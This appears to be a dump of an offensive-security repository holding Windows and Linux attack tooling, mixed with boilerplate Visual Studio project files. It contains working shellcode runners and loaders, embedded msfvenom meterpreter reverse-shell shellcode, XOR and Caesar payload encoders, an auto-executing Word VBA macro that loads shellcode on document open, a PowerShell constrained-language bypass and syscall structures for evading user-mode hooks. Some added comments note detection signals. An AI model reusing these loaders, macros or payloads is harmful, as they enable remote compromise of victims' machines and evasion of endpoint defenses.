/C++/API_Hooking/Inline-Minidump/Inline-Minidump.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/Process_Ninjection/Process_Ninjection.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/HeapAlloc_ShellCRunner/HeapAlloc_ShellCRunner.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/API_Hooking/Inline-VirtualAlloc/Inline-VirtualAlloc.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/CSharp/Linux-Post-Exploitation/xor_shellcode_loader.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | // gcc -o loader loader.c -z execstack
6 |
7 | //Shellcode
8 | // Paste in the encrypted xor shellcode
9 | unsigned char buf[] = "\x02\x7B\x83\x02\xCB\xA3\xBC\xB5\xB5\xB5\x02\xC7\x4F\xA5\xB5\xB5\xB5\x02\xF1\xFD\x9A\xFF\xF2\xBE\xDA\x73\x79\x02\x7B\x12\x6D\x02\x67\xB2\xB5\xB5\xB5\xA8\xBE\x97\xB3\xA7\x6B\xD4\xD8\x2C\x13\xFC\xC4\xF0\xF7\xF6\x4D\x3B\xC0\xFF\x9A\xFE\x49\xB4\xD0\x73\xF9\xAC\xD2\x76\x14\xD4\xCA\x29\x13\xD7\xC2\xF0\xF7\xD4\xD9\x2D\x31\x02\x54\x95\xD3\xE6\xD5\x76\x0C\x0B\xF0\xC4\xAA\x27\x92\xC8\x56\x9F\xF3\x91\xDD\xCD\xB2\x73\x2A\xB5\x13\x18\xA0\xE9\x92\xFA\x9F\xF2\x9F\xFF\xF2\xBE\xDA\x73\x79\x4A";
10 |
/*
 * XORs every byte of `buf` except the last with a one-byte key, then calls
 * the buffer as a function. The skipped byte is the terminating NUL that the
 * string-literal initialiser adds to the array.
 *
 * For analysis: a single-byte XOR key gives only 256 candidates, so the
 * encoded buffer can be recovered offline by trying each value; the key here
 * is the constant 'J'.
 */
int main(int argc, char **argv)
{
    // Arbitrary value
    const char xor_key = 'J';
    const int payload_len = (int) sizeof(buf) - 1;
    unsigned char *cursor = buf;
    unsigned char *stop = buf + payload_len;

    while (cursor < stop)
    {
        *cursor = *cursor ^ xor_key;
        cursor++;
    }

    // Run the shellcode
    int (*entry)() = (int(*)())buf;
    entry();
}
24 |
--------------------------------------------------------------------------------
/C++/ServiceShell/malware.h:
--------------------------------------------------------------------------------
1 | #include
2 | #include "shellcode.h"
3 |
PVOID VxMoveMemory(_Inout_ PVOID dest, _In_ const PVOID src, _In_ SIZE_T len);

// Byte-wise copy of `len` bytes from `src` to `dest` that tolerates
// overlapping ranges, in the manner of memmove. The copy runs front to back
// when the destination lies below the source and back to front otherwise.
// Returns `dest`.
PVOID VxMoveMemory(PVOID dest, const PVOID src, SIZE_T len) {
    char* out = (char*)dest;
    char* in = (char*)src;
    SIZE_T i;

    if (out < in) {
        // Destination starts lower: ascending order never overwrites source
        // bytes that are still to be read.
        for (i = 0; i < len; ++i)
            out[i] = in[i];
    } else {
        // Destination starts at or above the source: copy from the end.
        for (i = len; i > 0; --i)
            out[i - 1] = in[i - 1];
    }
    return dest;
}
24 |
// Copies `buf` (from shellcode.h) into a fresh read/write/execute allocation,
// starts a thread at its first byte and waits for that thread to end.
// Returns EXIT_FAILURE when the allocation fails and 0 otherwise; the result
// of CreateThread is not checked.
//
// For detection: both steps are observable. The region is private memory
// committed as PAGE_EXECUTE_READWRITE, and the new thread's start address
// lies inside that region rather than inside a loaded module.
int malware(void) {

    const SIZE_T size_shellcode = sizeof(buf);

    PVOID ptr = VirtualAlloc(NULL, size_shellcode,
                             (MEM_COMMIT | MEM_RESERVE),
                             PAGE_EXECUTE_READWRITE);
    if (!ptr) {
        return EXIT_FAILURE;
    }

    VxMoveMemory(ptr, buf, size_shellcode);

    HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ptr,
                                  NULL, 0, 0);

    WaitForSingleObject(hThread, INFINITE);
    return 0;
}
55 |
--------------------------------------------------------------------------------
/CSharp/Linux-Post-Exploitation/xor_shellcode_encoder.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | //Shellcode
6 | // msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.x.120 lport=443 -f c
7 | unsigned char buf[] =
8 | "\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05\xef\xff"
9 | "\xff\xff\x48\xbb\xb7\xd0\xb5\xb8\xf4\x90\x39\x33\x48\x31\x58"
10 | "\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xdd\xf9\xed\x21\x9e\x92"
11 | "\x66\x59\xb6\x8e\xba\xbd\xbc\x07\x71\x8a\xb5\xd0\xb4\x03\xfe"
12 | "\x9a\x39\xb3\xe6\x98\x3c\x5e\x9e\x80\x63\x59\x9d\x88\xba\xbd"
13 | "\x9e\x93\x67\x7b\x48\x1e\xdf\x99\xac\x9f\x3c\x46\x41\xba\x8e"
14 | "\xe0\x6d\xd8\x82\x1c\xd5\xb9\xdb\x97\x87\xf8\x39\x60\xff\x59"
15 | "\x52\xea\xa3\xd8\xb0\xd5\xb8\xd5\xb5\xb8\xf4\x90\x39\x33";
16 |
17 | int main (int argc, char **argv)
18 | {
19 | // Xor encryption value has to match the loader one
20 | char xor_key = 'J';
21 | int payload_length = (int) sizeof(buf);
22 |
23 | for (int i=0; i" % sys.argv[0])
32 | sys.exit()
33 |
34 | ciphertext = aesenc(plaintext, KEY)
35 |
36 | open("rcdata1.bin", "wb").write(ciphertext)
37 | print("Shellcode saved to rcdata1.bin")
38 |
39 | print('unsigned char key[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in KEY) + ' };')
40 | print('unsigned char shellcode[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
41 |
--------------------------------------------------------------------------------
/Powershell_CLM_Bypass/PSLangBypass/PSLangBypass/LangBypass.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 | using System.Management.Automation.Runspaces;
7 | using System.Management.Automation;
8 |
namespace PSLangBypass
{
    /// <summary>
    /// Hosts the PowerShell engine inside this process through a runspace it
    /// creates itself, rather than launching powershell.exe.
    /// </summary>
    /// <remarks>
    /// The only script run here writes the session's language mode to
    /// C:\Windows\Tasks\test.txt. Neither the runspace nor the PowerShell
    /// object is disposed. For monitoring: the engine lives in
    /// System.Management.Automation, so a process other than the PowerShell
    /// hosts loading that assembly, or an unexpected process writing under
    /// C:\Windows\Tasks, is the relevant signal. Script block logging, where
    /// enabled, is presumably still emitted because it is done by the engine
    /// rather than by the host (verify in your environment).
    /// </remarks>
    class LangBypass
    {
        static void Main(string[] args)
        {
            // Script to run: report the language mode of the hosted session.
            String cmd = "$ExecutionContext.SessionState.LanguageMode | Out-File -FilePath C:\\Windows\\Tasks\\test.txt";

            // Engine objects: one runspace, one pipeline bound to it.
            Runspace rs = RunspaceFactory.CreateRunspace();
            PowerShell ps = PowerShell.Create();

            rs.Open();
            ps.Runspace = rs;

            // Queue the script and execute it; the output is discarded.
            ps.AddScript(cmd);
            ps.Invoke();

            rs.Close();
        }
    }
}
37 |
--------------------------------------------------------------------------------
/ProcDump/ProcDump.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31424.327
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ProcDump", "ProcDump\ProcDump.csproj", "{538504F6-5F8E-4DE7-B5C8-DEBD8E285FB1}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {538504F6-5F8E-4DE7-B5C8-DEBD8E285FB1}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {538504F6-5F8E-4DE7-B5C8-DEBD8E285FB1}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {538504F6-5F8E-4DE7-B5C8-DEBD8E285FB1}.Release|Any CPU.ActiveCfg = Release|x64
17 | {538504F6-5F8E-4DE7-B5C8-DEBD8E285FB1}.Release|Any CPU.Build.0 = Release|x64
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {22F4A8F7-6204-41B4-B81F-1D30BE9EA9B7}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/VisualBasic/vba_shellcode_runner.vb:
--------------------------------------------------------------------------------
' Win32 imports used by mymacro. PtrSafe and LongPtr keep the declarations
' valid in 64-bit Office.
' For triage: a document macro that declares VirtualAlloc, RtlMoveMemory and
' CreateThread together is a strong static indicator of in-process code
' loading, independent of whatever bytes the macro carries.
' NOTE(review): ThreadParameter has no ByVal, so it is passed by reference.
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
4 |
' Copies the values in buf, one byte per element, into memory returned by
' VirtualAlloc and then starts a thread at that address. buf is an empty
' placeholder array in this listing. No return value is assigned.
Function mymacro()
    Dim buf As Variant
    Dim addr As LongPtr
    Dim counter As Long
    Dim data As Long
    Dim res As LongPtr

    buf = Array()

    ' &H3000 is MEM_COMMIT Or MEM_RESERVE; &H40 is PAGE_EXECUTE_READWRITE.
    ' The size passed is UBound(buf). The result is not checked.
    addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
    For counter = LBound(buf) To UBound(buf)
        ' data is a Long passed by reference; only its first byte is copied.
        data = buf(counter)
        res = RtlMoveMemory(addr + counter, data, 1)
    Next counter

    ' Thread start address is the allocation itself.
    res = CreateThread(0, 0, addr, 0, 0, 0)
End Function
22 |
23 |
' Word event handler: runs mymacro when the document is opened, provided
' macros are allowed to run. Auto-executing handlers such as this one are what
' macro-blocking policy and document scanners key on.
Sub Document_Open()
    mymacro()
End Sub
27 |
' Legacy Word auto-run macro name: also runs mymacro on open. Together with
' Document_Open it means the same routine is wired to two auto-execute entry
' points.
Sub AutoOpen()
    mymacro()
End Sub
--------------------------------------------------------------------------------
/C++/EarlyBird/EarlyBird.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
--------------------------------------------------------------------------------
/C++/SystemFunction032_RC4/SystemFunction032_RC4.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 |
23 |
24 | Source Files
25 |
26 |
27 |
--------------------------------------------------------------------------------
/PrintSpooferNET/PrintSpooferNET.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31424.327
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PrintSpooferNET", "PrintSpooferNET\PrintSpooferNET.csproj", "{CE5EB36F-4310-42B2-BD11-8E5C48FACB86}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {CE5EB36F-4310-42B2-BD11-8E5C48FACB86}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {CE5EB36F-4310-42B2-BD11-8E5C48FACB86}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {CE5EB36F-4310-42B2-BD11-8E5C48FACB86}.Release|Any CPU.ActiveCfg = Release|x64
17 | {CE5EB36F-4310-42B2-BD11-8E5C48FACB86}.Release|Any CPU.Build.0 = Release|x64
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {8A2ADB12-01D9-4CF9-9430-36DBD43AFC6C}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/C++/Reflective_DLLs/ReflectiveLoader/ReflectiveLoader.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
--------------------------------------------------------------------------------
/C++/MapViewSection_Injection/MapViewSection_Injection.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
--------------------------------------------------------------------------------
/CSharp/Shell_Service/Service1.Designer.cs:
--------------------------------------------------------------------------------
1 | namespace Shell_Service
2 | {
3 | partial class Service1
4 | {
5 | /// <summary>
6 | /// Required designer variable.
7 | /// </summary>
8 | private System.ComponentModel.IContainer components = null;
9 |
10 | /// <summary>
11 | /// Clean up any resources being used.
12 | /// </summary>
13 | /// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
14 | protected override void Dispose(bool disposing)
15 | {
16 | if (disposing && (components != null))
17 | {
18 | components.Dispose();
19 | }
20 | base.Dispose(disposing);
21 | }
22 |
23 | #region Component Designer generated code
24 |
25 | /// <summary>
26 | /// Required method for Designer support - do not modify
27 | /// the contents of this method with the code editor.
28 | /// </summary>
29 | private void InitializeComponent()
30 | {
31 | components = new System.ComponentModel.Container();
32 | this.ServiceName = "Service1";
33 | }
34 |
35 | #endregion
36 | }
37 | }
38 |
--------------------------------------------------------------------------------
/CSharp/Linux-Post-Exploitation/xor_mprotect_shellrunner.c:
--------------------------------------------------------------------------------
1 | #define _GNU_SOURCE
2 | #include
3 | #include
4 | #include
5 | #include
6 |
7 | // randomly placed newlines for further obfuscation
8 | //
9 | // Compile: gcc runner.c -o runner -z execstack
10 | //
11 | //Shellcode goes here
12 | // msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=? lport=443 -f c
13 | unsigned char buf[] = "";
14 |
15 | int main(int argc, char **argv) // Entry point: decodes buf in place, forks, and in the child calls buf as a function. argc/argv are unused.
16 | {
17 | printf("[*] Executing shellcode...\n");
18 |
19 | // Decoding: every byte of buf except the last (the string literal's terminating NUL) is XORed with one fixed byte. A single-byte key stored next to the data is obfuscation only; the decoded bytes are recoverable from the binary and are present in memory after this loop.
20 | char key = 'P';
21 | int arraysize = (int) sizeof(buf);
22 |
23 | for (int i = 0; i < arraysize - 1; i++)
24 | {
25 | buf[i] = buf[i] ^ key;
26 | }
27 |
28 | printf("[*] Checking for forked process...\n");
29 | printf("\n");
30 | // Child branch (fork() == 0): one page-sized region, starting at the page that contains buf, is changed to read+execute. The parent takes the else branch and only prints.
31 | if (fork()== 0)
32 | {
33 | intptr_t pagesize = sysconf(_SC_PAGESIZE);
34 | if (mprotect((void *)(((intptr_t)buf) & ~(pagesize - 1)),
35 | pagesize, PROT_READ|PROT_EXEC)) {
36 | perror("mprotect");
37 | return -1;
38 | }
39 | printf("\n");
40 | // Data-to-code transfer: a global data array that was modified and then re-protected is called through a function pointer. NOTE(review): mprotect() adding PROT_EXEC to an already-modified private mapping is the event SELinux execmod and audit/seccomp rules on mprotect are meant to surface - verify against local policy.
41 | int (*ret)() = (int(*)())buf;
42 | ret();
43 | printf("\n");
44 | } else {
45 | printf("[*] Returning from function... \n");
46 | //return 0;
47 | }
48 | printf("\n");
49 | return 3; // exit status 3 for the parent, and for the child if the call above returns
50 | }
51 |
--------------------------------------------------------------------------------
/CSharp/ShellcodeBuilder_VBA_Caesar/SCBuilder_VBA_Caesar.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Text;
3 |
4 | namespace ShellcodeBuilder_VBA_Caesar
5 | {
6 | class SCBuilder_VBA_Caesar
7 | {
8 | static void Main(string[] args) // Build-time helper: prints buf re-encoded as a comma-separated decimal list laid out with VBA line continuations. args is unused.
9 | {
10 |
11 | // Shellcode
12 | // msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.0.128 LPORT=443 -f csharp
13 | // Here
14 | // buf is not defined in this listing; the byte array was meant to be pasted at the placeholder above.
15 | // Encoding: each byte has 31 added and is wrapped to 0..255. This is a fixed additive shift, not encryption: subtracting 31 from every value restores the original bytes, which is how an analyst recovers the payload from a macro that carries such a list.
16 | byte[] encoded = new byte[buf.Length];
17 | for (int i = 0; i < buf.Length; i++)
18 | {
19 | encoded[i] = (byte)(((uint)buf[i] + 31) & 0xFF);
20 | }
21 |
22 | uint counter = 0;
23 | // Output format: decimal values separated by ", "; after every 50th value an underscore and a newline are appended (VBA line continuation).
24 | StringBuilder hex = new StringBuilder(encoded.Length * 2);
25 | foreach (byte b in encoded)
26 | {
27 | hex.AppendFormat("{0:D}, ", b);
28 | counter++;
29 | if (counter % 50 == 0)
30 | {
31 | hex.AppendFormat("_{0}", Environment.NewLine);
32 | }
33 | }
34 | // The reported length is buf.Length; the encoded array was allocated with the same length.
35 | Console.WriteLine("[+] Length of new payload: " + buf.Length);
36 | Console.WriteLine("[+] Payload: \n" + hex.ToString());
37 | }
38 | }
39 | }
40 |
--------------------------------------------------------------------------------
/C++/Heaven's_Gate/Heaven's_Gate.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 | Header Files
28 |
29 |
30 |
--------------------------------------------------------------------------------
/C++/HalosGate/prototypes.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include "structs.h"
4 |
5 | /*--------------------------------------------------------------------
6 | VX Tables
7 | --------------------------------------------------------------------*/
8 | typedef struct _VX_TABLE_ENTRY { // One table slot: a pointer, a 64-bit hash and a 16-bit system-call value.
9 | PVOID pAddress; // presumably the routine's address inside the module passed to GetVxTableEntry - confirm against the implementation
10 | DWORD64 dwHash; // presumably a hash of the export name, compared instead of a plaintext string - confirm
11 | WORD wSystemCall; // presumably the system service number extracted for this routine - confirm
12 | } VX_TABLE_ENTRY, * PVX_TABLE_ENTRY;
13 | // NOTE(review): the four slots below name the NT routines for allocate, change protection, create thread and wait. Calling them by number rather than through the documented API layer sidesteps user-mode hooks, so detection has to come from kernel-side telemetry or from checking where the syscall instruction was issued - confirm against the .asm stubs of this project.
14 | typedef struct _VX_TABLE {
15 | VX_TABLE_ENTRY NtAllocateVirtualMemory;
16 | VX_TABLE_ENTRY NtProtectVirtualMemory;
17 | VX_TABLE_ENTRY NtCreateThreadEx;
18 | VX_TABLE_ENTRY NtWaitForSingleObject;
19 | } VX_TABLE, * PVX_TABLE;
20 |
21 | /*--------------------------------------------------------------------
22 | Function prototypes.
23 | --------------------------------------------------------------------*/
24 | PTEB RtlGetThreadEnvironmentBlock(); // returns a TEB pointer; presumably the calling thread's - implementation not shown here
25 | BOOL GetImageExportDirectory( // takes a module base and writes an export-directory pointer through the out parameter; BOOL result presumably signals success - confirm
26 | _In_ PVOID pModuleBase,
27 | _Out_ PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory
28 | );
29 | BOOL GetVxTableEntry( // NOTE(review): pVxTableEntry is annotated _In_ although, by its name, the function looks like it fills the entry - check whether _Inout_ is the accurate annotation
30 | _In_ PVOID pModuleBase,
31 | _In_ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory,
32 | _In_ PVX_TABLE_ENTRY pVxTableEntry
33 | );
34 | BOOL Payload( // consumes a populated VX_TABLE; body not shown here
35 | _In_ PVX_TABLE pVxTable
36 | );
37 | PVOID VxMoveMemory( // memmove-style signature (dest, src, len); presumably a private copy routine so no CRT or API import is needed - confirm
38 | _Inout_ PVOID dest,
39 | _In_ const PVOID src,
40 | _In_ SIZE_T len
41 | );
--------------------------------------------------------------------------------
/C++/HellsGate/HellsGate/HellsGate.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Source Files
30 |
31 |
32 |
--------------------------------------------------------------------------------
/C++/API_Hooking/Detours/HookExe/HookExe.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 | Header Files
23 |
24 |
25 |
26 |
27 | Source Files
28 |
29 |
30 |
--------------------------------------------------------------------------------
/C++/PPID-Spoofing/PPID-Spoofing.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 | Header Files
28 |
29 |
30 | Header Files
31 |
32 |
33 |
--------------------------------------------------------------------------------
/C++/NT_Shellcoderunner/NT_Shellcoderunner.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 | Header Files
28 |
29 |
30 | Header Files
31 |
32 |
33 |
--------------------------------------------------------------------------------
/C++/HalosGate/HalosGate.vcxproj.filters:
